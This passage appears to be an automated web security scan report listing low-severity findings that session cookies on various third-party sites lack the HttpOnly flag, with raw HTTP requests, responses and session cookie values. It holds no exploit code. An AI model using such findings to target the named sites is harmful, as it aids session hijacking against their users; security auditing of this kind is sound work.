Date: Mon, 02 May 2011 22:24:13 GMT
Server: Microsoft-IIS/6.0
Content-Length: 20899
Content-Type: text/html
Set-Cookie: view=id=%2C2%2C; path=/
Set-Cookie: option=i%5Fid%5Flang=2; expires=Tue, 01-May-2012 22:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCQBDSQRQ=DJHFOBHDKCGMFLBFLDPOIJJP; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-e
...[SNIP]...

15.13. http://expertsystem.net/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://expertsystem.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: expertsystem.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:22:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 26280
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCACDTTDR=JFEIGGPCPJLGOBDOHIGKMLDP; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
   <meta http-equiv="Content-Type"
...[SNIP]...

15.14. http://factbook.eni.com/en

Summary

Severity:   Low
Confidence:   Firm
Host:   http://factbook.eni.com
Path:   /en

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en HTTP/1.1
Host: factbook.eni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: SESSd1d65348132f298e3a33d432aa778c49=nu29fif9eoum1fvcq35p6ali61; expires=Thu, 26-May-2011 01:57:44 GMT; path=/; domain=.factbook.eni.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 02 May 2011 22:24:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...

15.15. http://factbook.eni.com/en/home

Summary

Severity:   Low
Confidence:   Firm
Host:   http://factbook.eni.com
Path:   /en/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/home HTTP/1.1
Host: factbook.eni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: SESSd1d65348132f298e3a33d432aa778c49=irqcmvk5nhdv2e8ov35rcstsa7; expires=Thu, 26-May-2011 01:57:45 GMT; path=/; domain=.factbook.eni.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 02 May 2011 22:24:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...

15.16. http://finanza-mercati.ilsole24ore.com/fcxp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://finanza-mercati.ilsole24ore.com
Path:   /fcxp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fcxp HTTP/1.1
Host: finanza-mercati.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:24:25 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: JSESSIONID=8545EE5D514A53D1CEEEEA872B52D519; Path=/
Set-Cookie: JSESSIONID=254F862C155FA99E89A3249DA6026A7B; Path=/
Set-Cookie: PremiumCookie=false
Set-Cookie: PremiumCookie=false
Content-Length: 153
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

<!--
DUMMY PAGE
QUI SI E' VERIFICATO UN ERRORE:
"La risorsa richiesta non e' attualmente disponibile sul server. Per favore controllare"
DUMMY PAGE
-->


15.17. http://mightyblue.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://mightyblue.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: mightyblue.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:20:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 37743
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQASDSRC=EMENEEBDJOOMEPPBDBBOJNOH; path=/
Cache-control: private
ACCEPT-RANGES: none

<html>
<head>
<title>MightyBlue.com Hosting Services</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META name="description" content="MightyBlue Web and Email hos
...[SNIP]...

15.18. http://multicard.eni.com/it_en

Summary

Severity:   Low
Confidence:   Firm
Host:   http://multicard.eni.com
Path:   /it_en

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /it_en HTTP/1.1
Host: multicard.eni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:26:25 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_fastcgi/2.4.6 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: SESSf61565ecd016d8348c3898324bff0b39=gvo853ai5nqmadfdkb260sanv7; expires=Thu, 26-May-2011 01:59:45 GMT; path=/; domain=.multicard.eni.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 02 May 2011 22:26:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: ip2locale_lc=it_en; expires=Wed, 01-Jun-2011 22:26:25 GMT; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it_en" lang="it_en" dir="ltr">
<hea
...[SNIP]...

15.19. http://paginebianche.ilsole24ore.com/execute.cgi

Summary

Severity:   Low
Confidence:   Firm
Host:   http://paginebianche.ilsole24ore.com
Path:   /execute.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /execute.cgi HTTP/1.1
Host: paginebianche.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:26:34 GMT
Server: Apache
Set-Cookie: kpi=173.193.214.243.1304375194561290; path=/; expires=Thu, 29-Apr-21 22:26:34 GMT; domain=.ilsole24ore.com
Set-Cookie: PHPSESSID=1ffh2sghlilotqrq20u2nst8a1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sessionid=1ffh2sghlilotqrq20u2nst8a1; domain=.paginebianche.it
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 30688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="it">
<head><meta http-equiv="Content-Type" content=
...[SNIP]...

15.20. http://paginegialle.ilsole24ore.com/pgolfe/action

Summary

Severity:   Low
Confidence:   Firm
Host:   http://paginegialle.ilsole24ore.com
Path:   /pgolfe/action

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pgolfe/action HTTP/1.1
Host: paginegialle.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: CP='NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR SAMa BUS IND UNI COM NAV INT'
Content-Type: text/html;charset=UTF-8
Date: Mon, 02 May 2011 22:26:38 GMT
Content-Length: 12417
Connection: close
Set-Cookie: kpi=195.27.58.40.49021304375198356; path=/; expires=Thu, 29-Apr-21 22:26:38 GMT; domain=.paginegialle.it
Set-Cookie: sessionid=7101682110525820065; Path=/
Set-Cookie: kpi=173.193.214.243.1304375198; expires=Sun, 02-May-2021 22:26:38 GMT; path=/; domain=paginegialle.it

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.21. http://rainbow.mythings.com/pix.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://rainbow.mythings.com
Path:   /pix.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pix.aspx?atok=zx2-2183-it&eventtype=3&aid=200&mode=html&ver=2.5&ref=&r=0.9961211793124676 HTTP/1.1
Host: rainbow.mythings.com
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 22:16:02 GMT
Expires: -1
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Microsoft-IIS/6.0
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
Set-Cookie: mt_zx2-2183-it=02|QwAAAB+LCAAAAAAABADsvQdgHEmWJSYvbcp7f0r1StfgdKEIgGATJNiQQBDswYjN5pLsHWlHIymrKoHKZVZlXWYWQMztnbz33nvvvffee++997o7nU4n99//P1xmZAFs9s5K2smeIYCqyB8/fnwfPyJ+cXZ+/uh73x8tsuLRR3s7Ox+NmotH3/vFefvo3sh+1DaPPtrd3bm/s7e3t/vpzt5Ho+mj3VEzpxd/yfd/yf8TAAD//5lh16VDAAAA; domain=.mythings.com; expires=Fri, 01-Jul-2011 22:16:02 GMT; path=/
Set-Cookie: cksession=424bced9-3349-491e-b41d-abd485764b45; domain=.mythings.com; path=/
Set-Cookie: ckid=e983b326-a4f8-4e01-aae3-4bac13918ccc; domain=.mythings.com; expires=Sun, 02-May-2021 22:16:02 GMT; path=/
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
Set-Cookie: mttgt={ts:"110502221602",cmp:[]}; domain=.mythings.com; expires=Fri, 01-Jul-2011 22:16:02 GMT; path=/
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
X-AspNet-Version: 4.0.30319
x-machine-name: Rainbow-28 (i-00667d77)
X-Powered-By: ASP.NET
Content-Length: 3147
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>

<script type="text/javascr
...[SNIP]...

15.22. http://searchcio-midmarket.techtarget.com/definition/expert-system

Summary

Severity:   Low
Confidence:   Firm
Host:   http://searchcio-midmarket.techtarget.com
Path:   /definition/expert-system

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /definition/expert-system HTTP/1.1
Host: searchcio-midmarket.techtarget.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:29:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=57A0F5F504CF1CC8C3E5AC2F73CA1B4A; Path=/
Cache-Control: max-age=600
Expires: Mon, 02 May 2011 21:39:33 GMT
P3P: CP="CAO DSP COR NID CURa ADMa TAIa IVAo IVDo CONo TELo OTPo OUR IND PHY ONL UNI NAV DEM"
Set-Cookie: BIGipServervgn7-web=704759818.20480.0000; path=/
Content-Length: 53314

<!DOCTYPE html>
<html>
<head>
<meta name="pageStart" content="1304371780790" />


<!-- TTBC-TMP-Head, searchcio-midmarket.techtarget.
...[SNIP]...

15.23. http://searchcio.techtarget.com/news/2240030637/CIO-survey-IT-salaries-in-2010-and-how-they-vary-by-industry

Summary

Severity:   Low
Confidence:   Firm
Host:   http://searchcio.techtarget.com
Path:   /news/2240030637/CIO-survey-IT-salaries-in-2010-and-how-they-vary-by-industry

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/2240030637/CIO-survey-IT-salaries-in-2010-and-how-they-vary-by-industry HTTP/1.1
Host: searchcio.techtarget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:27:10 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=8A0EC464EE7664CEA88D868EA802EB5D; Path=/
P3P: CP="CAO DSP COR NID CURa ADMa TAIa IVAo IVDo CONo TELo OTPo OUR IND PHY ONL UNI NAV DEM"
Connection: close
Set-Cookie: BIGipServervgn7-web=704759818.20480.0000; path=/
Content-Length: 73912

<!DOCTYPE html>    
<html>
<head>
<script>
var appCode=55;
</script>
<meta name="pageStart" content="1304375230675" />


<!-- TMP
...[SNIP]...

15.24. https://secure.mightyblue.com/default.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mightyblue.com
Path:   /default.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /default.asp HTTP/1.1
Host: secure.mightyblue.com
Connection: keep-alive
Referer: http://mightyblue.com/
Cache-Control: max-age=0
Origin: http://mightyblue.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 107

selInterface=standard_XP&returnurl=http%3A%2F%2Fwww.mightyblue.com&txtUsername=&txtPassword=&submit22=Login

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:20:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 5889
Content-Type: text/html
Expires: Sun, 01 May 2011 21:20:34 GMT
Set-Cookie: HELM=Interface=&NonSecureReturnURL=; expires=Tue, 01-May-2012 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCABDABT=EEAKGJPDHNEFBMHOCDHJNHLA; path=/
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<lin
...[SNIP]...

15.25. https://secure.mightyblue.com/default.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mightyblue.com
Path:   /default.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /default.asp HTTP/1.1
Host: secure.mightyblue.com
Connection: keep-alive
Referer: http://mightyblue.com/
Cache-Control: max-age=0
Origin: http://mightyblue.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 107

selInterface=standard_XP&returnurl=http%3A%2F%2Fwww.mightyblue.com&txtUsername=&txtPassword=&submit22=Login

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:27:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 5889
Content-Type: text/html
Expires: Sun, 01 May 2011 21:27:32 GMT
Set-Cookie: HELM=Interface=&NonSecureReturnURL=; expires=Tue, 01-May-2012 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCBBBCAS=INBIJAJDCGCANBAFADADOAKF; path=/
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<lin
...[SNIP]...

15.26. http://technology.searchcio-midmarket.com/kw

Summary

Severity:   Low
Confidence:   Firm
Host:   http://technology.searchcio-midmarket.com
Path:   /kw

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kw HTTP/1.1
Host: technology.searchcio-midmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Resin/3.1.5
Pragma: no-cache
Cache-Control: no-cache
Expires: 0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en
Set-Cookie: JSESSIONID=abciclqX8qHL2b3JM0Y_s; path=/
Content-Type: text/html; charset=UTF-8
Connection: close
Date: Mon, 02 May 2011 22:27:04 GMT
Content-Length: 17205

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Sear
...[SNIP]...

15.27. http://technorati.com/faves

Summary

Severity:   Low
Confidence:   Firm
Host:   http://technorati.com
Path:   /faves

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

tvisitor
NEWTRSESSID

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /faves HTTP/1.1
Host: technorati.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:27:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: tvisitor=10.15.116.210.1304376345698242; path=/; expires=Sat, 30-Apr-16 22:45:45 GMT; domain=.technorati.com
Set-Cookie: NEWTRSESSID=63ab477fb51fe4463fa523fe6b49ec5a; expires=Wed, 03-Aug-2011 22:27:06 GMT; path=/; domain=technorati.com
Vary: Accept-Encoding
Connection: close


15.28. http://webshop.elsevier.com/specialissues/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://webshop.elsevier.com
Path:   /specialissues/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID
CFTOKEN
ELSEVIER_ESTREET

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /specialissues/?PII=S0957-4174(10)X0010-0 HTTP/1.1
Host: webshop.elsevier.com
Proxy-Connection: keep-alive
Referer: http://www.elsevier.com/wps/find/journaldescription.cws_home/939/description
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=1230653;path=/
Set-Cookie: CFTOKEN=32454531;path=/
Set-Cookie: ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D02%2000%3A00%3A00%27%7D;expires=Wed, 24-Apr-2041 21:31:17 GMT;path=/
Date: Mon, 02 May 2011 21:31:16 GMT
Content-Length: 17267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com
...[SNIP]...

15.29. http://websystem.ilsole24ore.com/jsp/Experteer_SGR_qi_100617_img.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://websystem.ilsole24ore.com
Path:   /jsp/Experteer_SGR_qi_100617_img.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsp/Experteer_SGR_qi_100617_img.jsp HTTP/1.1
Host: websystem.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1304392432178-New; s_lastvisit=1304392432179; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 May 2011 22:14:05 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny3 with Suhosin-Patch
Set-Cookie: JSESSIONID=B46049073F7B7F9881943AEA2DEE4830; Path=/jsp
Location: http://adv.ilsole24ore.it/RealMedia/ads/adstream_nx.ads/www.ilsole24ore.it/10/cobrand_experteer@x62
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 0


15.30. http://websystem.ilsole24ore.com/jsp/Guidaffari_SHW_qi_090114_img.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://websystem.ilsole24ore.com
Path:   /jsp/Guidaffari_SHW_qi_090114_img.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsp/Guidaffari_SHW_qi_090114_img.jsp HTTP/1.1
Host: websystem.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 May 2011 22:14:02 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny3 with Suhosin-Patch
Set-Cookie: JSESSIONID=61EF80E340B75E472EEBC0C0202B46D0; Path=/jsp
Location: http://adv.ilsole24ore.it/RealMedia/ads/adstream_nx.ads/advertising.ilsole24ore.com/2009/Guidaffari@x14
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 0


15.31. http://websystem.ilsole24ore.com/jsp/PortaleAutomob_SGR_qi_081104_HTMGIF.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://websystem.ilsole24ore.com
Path:   /jsp/PortaleAutomob_SGR_qi_081104_HTMGIF.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsp/PortaleAutomob_SGR_qi_081104_HTMGIF.jsp HTTP/1.1
Host: websystem.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1304392432178-New; s_lastvisit=1304392432179; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 May 2011 22:14:05 GMT
